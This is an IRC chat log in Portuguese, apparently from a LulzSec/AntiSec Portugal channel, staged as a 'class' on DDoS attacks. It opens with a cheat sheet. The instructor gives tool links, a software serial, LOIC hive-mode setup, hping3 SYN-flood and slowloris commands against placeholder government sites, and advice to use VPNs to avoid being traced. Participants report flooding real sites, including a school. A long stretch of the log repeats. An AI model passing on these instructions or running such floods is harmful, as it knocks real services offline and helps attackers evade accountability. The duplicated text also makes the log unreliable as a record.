#AntiSecPT | ATAQUE DDOS (1ª parte)

aula/discussão ATAQUE DDOS (1ª parte) por c0ldc0d3r -
------------------------------------------------------------------------------------------------------------
Aula Resumida:
----
Windows
        DoSHTTP 2.5.1
                DOWNLOAD URL: http://www.socketsoft.net/download/doshttp_setup.exe
                SERIAL: dh10a-0064-5612-1234-37b5-9701

        LOIC (é só correr):
                DOWNLOAD URL: http://sourceforge.net/projects/hivemindloic/files/latest/download
                Server: irc.freshirc.com
                Canal: #lulzsecportugal
                        Mudar para: FUCKING IRC HIVE MODE

----//-------------//------------

Linux:

        Install: sudo apt-get install hping3
        Flood Command: hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
        Case of lag: --flood para -i u100

----//------------//-------------

        Verificar portas: ping.eu/port-chk/
------------------------------------------------------------------------------------------------------------
Aula Resumida:
------------------------------------------------------------------------------------------------------------

* w4r10ck (webchat@AN-ivc.474.m6tpja.IP) entrou em #aula
* Marmelo (marmelo@lulzsecportugal.com) entrou em #aula
<Marmelo> boas
<c0ldc0d3r> boas
<AntiSecPT278> broas
<AntiSecPT278> xD
<Marmelo> c0ld voz me plss?
<Marmelo> olha que sacrificio
<Marmelo> estava eu a jogar
* c0ldc0d3r oferece voz a Marmelo
<Marmelo> e sai do windows so para vir para aqui
<Marmelo> tas a ver lol
* VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
* w4r10ck saiu (Ping timeout: 121 seconds)
* Dagun (webchat@AN-mif.uvq.rloiam.IP) entrou em #aula
* inetking (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
<Dagun> boas
* mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
* MikeZ (webchat@AN-fs7.uas.g29tu8.IP) entrou em #aula
* l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
* bl4ck (webchat@AN-f49.isc.j12pk9.IP) entrou em #aula
* w4r10ck (webchat@AN-vv8.k64.45hl4i.IP) entrou em #aula
* sc0rp (sc0rp@127.0.0.1) entrou em #aula
* joao_ (joao@AN-j69.rhd.6cqjs0.IP) entrou em #aula
* AntiSecPT594 (webchat@AN-3rl.a7v.g29tu8.IP) entrou em #aula
* Made (webchat@AN-q7o.pmt.arjsab.IP) entrou em #aula
* trolololguy_ (trolololguy__@AN-ter.ilk.h3nreq.IP) entrou em #aula
* JojO1z (webchat@AN-gc1.4mh.hqmp6l.IP) entrou em #aula
<c0ldc0d3r> Então pessoal, tudo bem com vocês?
<Marmelo> c0ld é melhor fazeres +m acho que é isso
<c0ldc0d3r> hum?
<Marmelo> eu estou +/-
<c0ldc0d3r> podes ir jogar lol
<wokmaster> could be better
<wokmaster> :)
<Marmelo> tipo estou a dizer para bloquares o chat daqui a um bocado
* krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
<c0ldc0d3r> népia
* emptydev (a@emptydev.google.suck.it) entrou em #aula
<c0ldc0d3r> senão como vão tirar dúvidas?
<emptydev> Que cena :o
<Marmelo> a sim por pvt pah
<Marmelo> como ontem
<Marmelo> senao é uma confusao ...
<c0ldc0d3r> pvt o cr** que não vou estar a responder um a um.
<Made> o prof tá atrasado 7 min bora bazar xD
* Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
<Marmelo> lol Made
<c0ldc0d3r> Made, hahah
<Made> :D
<mitsai> é aqui
<mitsai> +v
<mitsai> pl
<c0ldc0d3r> Mais uns 2 minutos e começamos.
<Marmelo> mas olha tamos tipo a explicar
<Marmelo> e vai vir um otario a fazer spam
<c0ldc0d3r> leva ban.
<Marmelo> se for como ontem 100+ pessoas
<Marmelo> imagina
<c0ldc0d3r> não vai ser lol
<c0ldc0d3r> irc está tudo mamado
<Marmelo> lol
<Marmelo> isso é bom entao lol
<AntiSecPT278> é neste ou no anonnet.org?
<c0ldc0d3r> é aqui a aula.
<AntiSecPT278> felizmente
<AntiSecPT278> o outro está péssimo
<c0ldc0d3r> ok, vamos dar início.
<w4r10ck> c0ld é que ta bue pessoal no anonnet
<AntiSecPT278> deviam actualizar o twitter com o correcto
<c0ldc0d3r> w4r10ck, tem que ser neste...
<w4r10ck> yah yah tb acho melhor o outro server ta uma lastima
* krak-chevaliers saiu (Ping timeout: 121 seconds)
* tuga (webchat@AN-iuq.ep7.6cqjs0.IP) entrou em #aula
<c0ldc0d3r> vão ser necessárias 2 ferramentas para os ataques DDoS
<c0ldc0d3r> para quem usa window$ claro.
<tuga> a aula já começou á muito? :/
<c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
<c0ldc0d3r> tuga, acabou de começar.
<Marmelo> lol ainda nao começou praticamente
<Marmelo> vamos la
<Marmelo> Apartir de agora so podem mandar uma mensagem de cada vez e tem que ser uma questao ou algo importante
<c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
<Marmelo> Pergunta : E o GoodBye?
<c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
<joao_> e quem tem linux ?
<c0ldc0d3r> Marmelo, goodbye não é muito seguro.. ele crasha a meio do ataque.
<c0ldc0d3r> joao_, já digo para quem tem linux.
* Gunp0wd3rPl0t saiu (Ping timeout: 121 seconds)
<c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
* l4m8d4 saiu (*.net *.split)
* wokmaster saiu (*.net *.split)
<c0ldc0d3r> poderão*
<c0ldc0d3r> Agora, para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
* l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
<tuga> pergunta: qual é o site que está a ser vitima entao?
<c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
<AntiSecPT278> -.-
<c0ldc0d3r> Caso a rede vá abaixo, mudem de --flood para -i u100
<c0ldc0d3r> Dúvidas?
<Marmelo> Sim
<Marmelo> o que queres dizer com rede ?
<c0ldc0d3r> a vossa própria "internet"
<c0ldc0d3r> ou seja, se não conseguirem acessar o google por exemplo, devido ao ataque.
<Marmelo> ok
<c0ldc0d3r> para não estar a sob-carregar a rede, mudam de --flood para -i u100
<c0ldc0d3r> olha depois mete isto tudo no pastebin e dá ao caravela..
<mitsai> --- www.xxxxxxxxx.rcts.pt hping statistic ---
<mitsai> 351986 packets transmitted, 0 packets received, 100% packet loss // Este site nao responde aos pedidos de ping.
<Marmelo> ok ve se me lembras
<Made> Pergunta: Servidores que usam CloudLinux, e a firewall não deixa fazer mais do que 3 requests por segundo essas ferramentas dão?
<sc0rp> o loic sim da
<c0ldc0d3r> Made, humm..
<sc0rp> pois envia a informaçao dentro de uma unica coneção ao envez de criar multiplas ligaçoes
<c0ldc0d3r> isso não serve de muito
* Tsunamy_ (webchat@AN-1ob.9be.j12pk9.IP) entrou em #aula
<c0ldc0d3r> mandar 3 requests por segundo..
<c0ldc0d3r> nem faz muito sentido..
<c0ldc0d3r> porém, poderás usar o slowloris
* wokmaster (rooting@AN-pqc.tda.sh4ali.IP) entrou em #aula
<c0ldc0d3r> http://ha.ckers.org/slowloris/slowloris.pl
<sc0rp> bem era esse que me estava a referir
<emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
<Made> não é mandar, a firewall é que não deixa fazer c0ldc0der
<sc0rp> e nao o loic
<c0ldc0d3r> depois é só fazer perl slowloris.pl -dns www.vitima.com -timeout 5
<tuga> <~c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt |||| nao percebi esta parte :S
<sc0rp> peço desculpa
<c0ldc0d3r> tuga, essa parte é só para quem usar linux
<c0ldc0d3r> usas linux?
<tuga> ah ok
<tuga> w vista
<c0ldc0d3r> emt
<tuga> nop
<c0ldc0d3r> então fica-te pelo loic & DoSHTTP 2.5.1
<emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
<tuga> sim, o loic ja fiz a cena de conectar, deu-me um IP, o dosHTTP também já registei o serial, mas agora o que faço?
<c0ldc0d3r> emptydev, servidores disponíveis como assim? os da vítima?
<emptydev> Yup.. DNS's...
<Marmelo> Pergunta MUITO importante : Portanto para não saberem o nosso IP verdadeiro , ao usar algum desses programas teremos que usar um vpn ?
* sh4d0wf40 (other@AN-uui.9t0.s1ct8s.IP) entrou em #aula
<c0ldc0d3r> para verificar se o ataque está a causar impacto, é ir ao ping.eu/port-chk/ e colocar o site e a porta 80
* krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
<c0ldc0d3r> Marmelo, sim, sempre ajuda mais usar vpn
* Grep (Grep@AN-t3n.nat.sh4ali.IP) entrou em #aula
<sc0rp> bem
<emptydev> c0ldc0d3r, esse site não verifica só se a porta 80 está aberta?
<c0ldc0d3r> sim, que é a porta do site.
<tuga> dúvida: nós é que escolhemos um site qualquer para fazer o que estámos a fazer agora?
<Marmelo> Pergunta : No loic existe algumas opçoes de ataque , que nao me lembro , penso que era HTTP , ...
<c0ldc0d3r> o resto pouco interessa.
<Marmelo> qual a melhor dessas
<sc0rp> fiz um pequeno video de uma ferramenta de synflood, contudo nao derrubei nenhum site de proposito
<c0ldc0d3r> tuga, sim.
* neopunk (neopunk@AN-edd.acp.kbtmgr.IP) entrou em #aula
<c0ldc0d3r> Marmelo, sim, há o http, tcp e o udp
<sc0rp> penso que nao faz mal nenhum verem como se procede um attack
<sc0rp> http://videobam.com/nDOqA
<Marmelo> qual deles sera o melhor?
<c0ldc0d3r> o tcp e o http..
<c0ldc0d3r> porém, se for muita gente, o udp é muito bom.. pois causa impacto na rede toda..
* Desligou (Ligação terminada no destino).
 FiSH: Chat in #aula will NOT be encrypted (no key found)
* A conversar em #aula
* ChanServ coloca o modo +q #aula c0ldc0d3r
* ChanServ coloca o modo de operador a c0ldc0d3r
<c0ldc0d3r> peço desculpa
<c0ldc0d3r> tive um problema na rede
<tuga> nao tou a perceber nada disto lol xD
<Marmelo> np
<sc0rp> é um pouco mais simplificado mas nao tem tantas opções
<tuga> na boa
* poptrolha (webchat@AN-j3o.6q6.l7icd1.IP) entrou em #aula
<c0ldc0d3r> tuga, fizeste download das ferramentas?
<sc0rp> wireshark
<sc0rp> *
* Caravela|Lulz (boh@caravela.lulz.pt) entrou em #aula
* ChanServ coloca o modo +q #aula Caravela|Lulz
* ChanServ coloca o modo de operador a Caravela|Lulz
<Marmelo> ah ok entao o wireshark fica mais simples ne?
<tuga> sim
<sc0rp> estava a mudar o portatil de sitio
<Made> DDos? :D
<sc0rp> no
<Marmelo> ok entao
<AntiSecPT278> no wireshark tens filtros
* PATRAOjhN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
<sc0rp> é mais simples para quem entende o trafico e muito melhor para iniciantes, mas o etherape e muito mai facil de usar contudo a informação recebida do servidor nao e a mais detalhada
<sh4d0wf40> pessoal peço desculpa incomudar..mas na outra sala está lá pessoal que queria assistir as aulas mas não dá para falar e avisar o pessoal..só o caravela é que é op
* Caravela|Lulz coloca o modo +m #aula
* ruicruz (ruicruz@AN-tic.j0n.g9g7iv.IP) entrou em #aula
<c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
<c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
<c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
* AntiSecPT407 (webchat@AN-2ha.off.6qn8qq.IP) entrou em #aula
<c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
* aula754 (558a3c21@AN-trk.ahu.7j6nol.IP) entrou em #aula
* unkn0wn (unkn0wn@AN-g1c.sni.4imr8a.IP) entrou em #aula
<c0ldc0d3r> para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
<c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
<Marmelo> Relembro que usem vpn enquanto fazem isto!
<c0ldc0d3r> Caravela|Lulz, vai colocando isso no pastebin que não estou para repetir mais vezes
<c0ldc0d3r> Caravela|Lulz, colocas-te +m e agora as dúvidas lol?
<Caravela|Lulz> duvidas façam em pvt
<Caravela|Lulz> depois fazes copy paste aqui e respondes
<Caravela|Lulz> para nao haver spam
* kaos (webchat@AN-c5d.qud.arjsab.IP) entrou em #aula
<c0ldc0d3r> pois, mas eu tenho o xchat cheio de redes e não dá-me jeito nenhum
<Marmelo> caravela estava a ir bem
<Caravela|Lulz> ok
* Caravela|Lulz coloca o modo -m #aula
<Marmelo> ok alguma pergunta?
* c0ldc0d3r coloca o modo de operador a mitsai
* c0ldc0d3r oferece voz a mitsai
<Marmelo> Relembro que quem fizer spam leva ban imediato
* jgut (529ab6c4@AN-trk.ahu.7j6nol.IP) entrou em #aula
<tuga> sim
<Caravela|Lulz> faz me um copy paste do log até agora para eu depois guardar em pastebin
<c0ldc0d3r> paste onde?
<tuga> coldcoder, já diz tudo até tu onde disses-te, e agora?
<c0ldc0d3r> piratepad?
<jgut> nights a tds
<c0ldc0d3r> tuga, agora é guardar tudo e amanhã colocarás em ação.
* PATRAOjhN agora chama-se afk_johnnyPATRAODANET
<Marmelo> lol ja acabou a aula?
<sc0rp> lol
* Hikas (5998a3a5@AN-k5k.v7s.hin4td.IP) entrou em #aula
* jpir (webchat@AN-he6.c2p.6om10t.IP) entrou em #aula
<c0ldc0d3r> Marmelo, não há muito à dizer..
<Marmelo> pois nao lol
* jgut saiu (Quit: http://www.mibbit.com ajax IRC Client)
<tuga> amanha? mas escolho um site que eu quiser? tenho de começar a fazer o ataque hoje e deixar a noite toda o pc ligado?
* Kondoriano (marco@AN-6rp.b7j.od2i7s.IP) entrou em #aula
<c0ldc0d3r> agora é saber se o pessoal entendou..
* MaP05 (MaP05@AN-qbn.nlh.vg3fe8.IP) entrou em #aula
<c0ldc0d3r> já vi que alguém conectou o loic ao hive..
<c0ldc0d3r> 2 pessoas
<trolololguy_> uma pergunta
<Made> c0ldc0der tens é de fazer ai uma auma de sqli
<AntiSecPT278> O tuga está com fé de ir dentro
* anarchy (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
<Made> *uma
<Grep> c0ldc0d3r, para linux o LOIC é igual?
<trolololguy_> disseste anteriormente q udp era mais eficaz
<trolololguy_> podes dizer pq?
<Marmelo> LOIC nao da no linux
<trolololguy_> sr professor?
<c0ldc0d3r> Grep, sim
<c0ldc0d3r> é mais complicado
<c0ldc0d3r> mas não recomendo loic para linux..
<c0ldc0d3r> hping3 é mil vezes melhor
<Kondoriano> já começou?
<Marmelo> ah my bad pensava que o loic nao dava para o linux
<mitsai> sim mt melhor
<Grep> ok isso já tenho ;) como vi a falar de ligar a um irc...
<Grep> Marmelo, dar dá... com wine :P
<Marmelo> <trolololguy_> disseste anteriormente q udp era mais eficaz
* Cereal_Killer (webchat@AN-opo.t9n.1tveis.IP) entrou em #aula
<c0ldc0d3r> Caravela|Lulz, onde queres que faça paste do log?
* emptydev- (a@AN-928.r71.7am7ru.IP) entrou em #aula
<emptydev-> Caravela|Lulz
<emptydev-> PVT
* dgrdfg (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
<emptydev-> http://pastebin.com/TfnBWewg
<emptydev-> Vejam
* fx (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
<c0ldc0d3r> emptydev, boa.
* beh (boh@AN-us8.nsn.ovi93d.IP) entrou em #aula
* c0ldc0d3r mudou o tópico para: Aula de hoje resumida: http://pastebin.com/TfnBWewg
<dgrdfg> estava eu dizendo que deveria haver um sitio pra podermos colocar duvidas e que deviamos elaborar uma faq
<dgrdfg> visto que as duvidas são mais que muitas
<c0ldc0d3r> dgrdfg, poderás colocar aqui
<dgrdfg> e muitas questões são constantemente respondidas
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
<dgrdfg> tipo sempre o msm
* An0nf40 (other@AN-i37.9oq.2s61dc.IP) entrou em #aula
<beh> bem pensado
* inetking saiu (Ping timeout: 121 seconds)
* fx agora chama-se inetking
<c0ldc0d3r> podem usar este canal para ajuda..
<c0ldc0d3r> é na boa..
<dgrdfg> c0m0 3h k x3 h@k@ u Fb| ?
* jhNNN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
<dgrdfg> por exemplo
<dgrdfg> tenho uma duvida
* emptydev saiu (Ping timeout: 121 seconds)
* MaP05 saiu (Ping timeout: 122 seconds)
* l4m8d4_ (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
<dgrdfg> porque é que com algumas VPN's n consigo aceder a determinados sites
* Funho saiu (Ping timeout: 121 seconds)
<dgrdfg> ou servers
<dgrdfg> e como evitar que isso aconteça
* anarchy saiu (Ping timeout: 121 seconds)
<Grep> c0ldc0d3r, aquele site ping.eu n é melhor o nmap ?
* dgrdfg agora chama-se anarchy
<c0ldc0d3r> isso tem haver com o policy que eles têm contra abusos do serviço..
* AntiSecPT570 (webchat@AN-t76.bhi.3kcki8.IP) entrou em #aula
<tuga> coldcoder, quanto tiveres tempo, se tiveres tempo e se fizeres o favor de me contactar, por favor contacta-me em pvt, obrigado
<c0ldc0d3r> tens que usar outra vpn e de preferência fora da europa.
<Made> amanha há aula?
<anarchy> pois foi o que eu pensei
<anarchy> há que pagar :F
<c0ldc0d3r> Grep, o nmap verifica com o teu ip
* VenusProject saiu (Ping timeout: 121 seconds)
<c0ldc0d3r> o ping.eu não.
<anarchy> mas há vpn's que têm ports fechadas?
<c0ldc0d3r> tuga, ok
* ruicruz saiu (Ping timeout: 127 seconds)
* afk_johnnyPATRAODANET saiu (Ping timeout: 127 seconds)
* kaos saiu (Quit: Page closed)
<Grep> Grep, com o proxychains não, pois não? pelo menos pelo que li :S
* Kondoriano saiu (Ping timeout: 129 seconds)
* aula754 saiu (Ping timeout: 128 seconds)
* sc0rp saiu (Ping timeout: 129 seconds)
<c0ldc0d3r> proxychains poderá resultar...
<c0ldc0d3r> é uma questão de verificar
* w4r10ck saiu (Quit: )
* Hikas saiu (Ping timeout: 132 seconds)
* Caravela|Lulz saiu (Ping timeout: 125 seconds)
* l4m8d4 saiu (Ping timeout: 131 seconds)
* joao_ saiu (Ping timeout: 125 seconds)
* Marmelo saiu (Ping timeout: 122 seconds)
* trolololguy_ saiu (Ping timeout: 129 seconds)
* mitsai saiu (Ping timeout: 125 seconds)
* sh4d0wf40 saiu (Ping timeout: 157 seconds)
* l4m8d4_ agora chama-se l4m8d4
<Grep> tenho feito uns testes, obvio que é mais lento mas tem funcionado... mas é sempre bom haver outras soluções ;) já aprendi kk koisa
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
<emptydev-> Tinhamos ido para a quakenet, tinhamos + gente, e ninguem caia.
<c0ldc0d3r> emptydev-, link.
<c0ldc0d3r> que eu dou ao caravela
<c0ldc0d3r> para por no twitter
<Grep> só uma questão que eu cheguei a meio da aula...
<tuga> c0ldc0d3r, é suposto no LOIC, em baixo em attack status aparecer muitas vezes a dizer failed? pq tenho uns 32.000
<Grep> o hping3 substitui o DoSHTTP e o Loic certo?
<c0ldc0d3r> é, isso significa que o servidor está deixando de responder.
<c0ldc0d3r> Grep, sim.
<An0nf40> tuga tu estás a fazer isso com uma vpn certo?
<tuga> nao lool
<An0nf40> ou estás simplesmente a testar sem nada lol
<c0ldc0d3r> vpn é necessário, visto que somos poucos..
<tuga> mas tipo
<c0ldc0d3r> se fosse tipo 2 mil e tal pessoas a colaborar.. era cagativo usar vpn no meio de tantos ips..
<tuga> eu ponho em perigo outras pessoas?
<c0ldc0d3r> mas como são poucos :\
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
<aaaamitsai> +v +o
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
* Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
<tuga> mas eu nao testei num site do governo
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
* mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
* VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
<An0nf40> não precisa ser do governo lol
<mitsai> +v +o pl
* emptydev- saiu (Ping timeout: 121 seconds)
<An0nf40> eles dão mais importancia a esses...
<tuga> sim, mas acho que uma escola eles nao dao importancia o.O xD
<Grep> lol omg
* DaGun (webchat@AN-a0h.8na.8e30u1.IP) entrou em #aula
* An0nf40 agora chama-se sh4d0wf40
<DaGun> boas, vao por a aula de hoje no pastebin?
<tuga> ao desligar o ataque no LOIC o site volta imediatamente online certo?
<DaGun> e que tava com problemas na net e perdi uma parte
<DaGun> :S
<sh4d0wf40> lolol
<DaGun> xD
<tuga> dagun, ja puseram penso eu
<Made> DaGun http://pastebin.com/TfnBWewg]
<DaGun> só?
<c0ldc0d3r> tuga, sim e não.
* LzKotha (webchat@AN-dft.gs0.hkmcdf.IP) entrou em #aula
<c0ldc0d3r> se o impacto for muito grande.. o site poderá ficar off até haver assistência física.
<DaGun> é que eu isso apanhei xD
* MovingForward (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
<tuga> ah ok
<mitsai> +v +o pls
<Made> Ao usar uma vpn, a vnp não fica com os meus dados no log?

* w4r10ck (webchat@AN-ivc.474.m6tpja.IP) entrou em #aula
* Marmelo (marmelo@lulzsecportugal.com) entrou em #aula
<Marmelo> boas
<c0ldc0d3r> boas
<AntiSecPT278> broas
<AntiSecPT278> xD
<Marmelo> c0ld voz me plss?
<Marmelo> olha que sacrificio
<Marmelo> estava eu a jogar
* c0ldc0d3r oferece voz a Marmelo
<Marmelo> e sai do windows so para vir para aqui
<Marmelo> tas a ver lol
* VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
* w4r10ck saiu (Ping timeout: 121 seconds)
* Dagun (webchat@AN-mif.uvq.rloiam.IP) entrou em #aula
* inetking (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
<Dagun> boas
* mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
* MikeZ (webchat@AN-fs7.uas.g29tu8.IP) entrou em #aula
* l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
* bl4ck (webchat@AN-f49.isc.j12pk9.IP) entrou em #aula
* w4r10ck (webchat@AN-vv8.k64.45hl4i.IP) entrou em #aula
* sc0rp (sc0rp@127.0.0.1) entrou em #aula
* joao_ (joao@AN-j69.rhd.6cqjs0.IP) entrou em #aula
* AntiSecPT594 (webchat@AN-3rl.a7v.g29tu8.IP) entrou em #aula
* Made (webchat@AN-q7o.pmt.arjsab.IP) entrou em #aula
* trolololguy_ (trolololguy__@AN-ter.ilk.h3nreq.IP) entrou em #aula
* JojO1z (webchat@AN-gc1.4mh.hqmp6l.IP) entrou em #aula
<c0ldc0d3r> Então pessoal, tudo bem com vocês?
<Marmelo> c0ld é melhor fazeres +m acho que é isso
<c0ldc0d3r> hum?
<Marmelo> eu estou +/-
<c0ldc0d3r> podes ir jogar lol
<wokmaster> could be better
<wokmaster> :)
<Marmelo> tipo estou a dizer para bloquares o chat daqui a um bocado
* krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
<c0ldc0d3r> népia
* emptydev (a@emptydev.google.suck.it) entrou em #aula
<c0ldc0d3r> senão como vão tirar dúvidas?
<emptydev> Que cena :o
<Marmelo> a sim por pvt pah
<Marmelo> como ontem
<Marmelo> senao é uma confusao ...
<c0ldc0d3r> pvt o cr** que não vou estar a responder um a um.
<Made> o prof tá atrasado 7 min bora bazar xD
* Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
<Marmelo> lol Made
<c0ldc0d3r> Made, hahah
<Made> :D
<mitsai> é aqui
<mitsai> +v
<mitsai> pl
<c0ldc0d3r> Mais uns 2 minutos e começamos.
<Marmelo> mas olha tamos tipo a explicar
<Marmelo> e vai vir um otario a fazer spam
<c0ldc0d3r> leva ban.
<Marmelo> se for como ontem 100+ pessoas
<Marmelo> imagina
<c0ldc0d3r> não vai ser lol
<c0ldc0d3r> irc está tudo mamado
<Marmelo> lol
<Marmelo> isso é bom entao lol
<AntiSecPT278> é neste ou no anonnet.org?
<c0ldc0d3r> é aqui a aula.
<AntiSecPT278> felizmente
<AntiSecPT278> o outro está péssimo
<c0ldc0d3r> ok, vamos dar início.
<w4r10ck> c0ld é que ta bue pessoal no anonnet
<AntiSecPT278> deviam actualizar o twitter com o correcto
<c0ldc0d3r> w4r10ck, tem que ser neste...
<w4r10ck> yah yah tb acho melhor o outro server ta uma lastima
* krak-chevaliers saiu (Ping timeout: 121 seconds)
* tuga (webchat@AN-iuq.ep7.6cqjs0.IP) entrou em #aula
<c0ldc0d3r> vão ser necessárias 2 ferramentas para os ataques DDoS
<c0ldc0d3r> para quem usa window$ claro.
<tuga> a aula já começou á muito? :/
<c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
<c0ldc0d3r> tuga, acabou de começar.
<Marmelo> lol ainda nao começou praticamente
<Marmelo> vamos la
<Marmelo> Apartir de agora so podem mandar uma mensagem de cada vez e tem que ser uma questao ou algo importante
<c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
<Marmelo> Pergunta : E o GoodBye?
<c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
<joao_> e quem tem linux ?
<c0ldc0d3r> Marmelo, goodbye não é muito seguro.. ele crasha a meio do ataque.
<c0ldc0d3r> joao_, já digo para quem tem linux.
* Gunp0wd3rPl0t saiu (Ping timeout: 121 seconds)
<c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
* l4m8d4 saiu (*.net *.split)
* wokmaster saiu (*.net *.split)
<c0ldc0d3r> poderão*
<c0ldc0d3r> Agora, para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
* l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
<tuga> pergunta: qual é o site que está a ser vitima entao?
<c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
<AntiSecPT278> -.-
<c0ldc0d3r> Caso a rede vá abaixo, mudem de --flood para -i u100
<c0ldc0d3r> Dúvidas?
<Marmelo> Sim
<Marmelo> o que queres dizer com rede ?
<c0ldc0d3r> a vossa própria "internet"
<c0ldc0d3r> ou seja, se não conseguirem acessar o google por exemplo, devido ao ataque.
<Marmelo> ok
<c0ldc0d3r> para não estar a sob-carregar a rede, mudam de --flood para -i u100
<c0ldc0d3r> olha depois mete isto tudo no pastebin e dá ao caravela..
<mitsai> --- www.xxxxxxxxx.rcts.pt hping statistic ---
<mitsai> 351986 packets transmitted, 0 packets received, 100% packet loss // Este site nao responde aos pedidos de ping.
<Marmelo> ok ve se me lembras
<Made> Pergunta: Servidores que usam CloudLinux, e a firewall não deixa fazer mais do que 3 requests por segundo essas ferramentas dão?
<sc0rp> o loic sim da
<c0ldc0d3r> Made, humm..
<sc0rp> pois envia a informaçao dentro de uma unica coneção ao envez de criar multiplas ligaçoes
<c0ldc0d3r> isso não serve de muito
* Tsunamy_ (webchat@AN-1ob.9be.j12pk9.IP) entrou em #aula
<c0ldc0d3r> mandar 3 requests por segundo..
<c0ldc0d3r> nem faz muito sentido..
<c0ldc0d3r> porém, poderás usar o slowloris
* wokmaster (rooting@AN-pqc.tda.sh4ali.IP) entrou em #aula
<c0ldc0d3r> http://ha.ckers.org/slowloris/slowloris.pl
<sc0rp> bem era esse que me estava a referir
<emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
<Made> não é mandar, a firewall é que não deixa fazer c0ldc0der
<sc0rp> e nao o loic
<c0ldc0d3r> depois é só fazer perl slowloris.pl -dns www.vitima.com -timeout 5
<tuga> <~c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt |||| nao percebi esta parte :S
<sc0rp> peço desculpa
<c0ldc0d3r> tuga, essa parte é só para quem usar linux
<c0ldc0d3r> usas linux?
<tuga> ah ok
<tuga> w vista
<c0ldc0d3r> emt
<tuga> nop
<c0ldc0d3r> então fica-te pelo loic & DoSHTTP 2.5.1
<emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
<tuga> sim, o loic ja fiz a cena de conectar, deu-me um IP, o dosHTTP também já registei o serial, mas agora o que faço?
<c0ldc0d3r> emptydev, servidores disponíveis como assim? os da vítima?
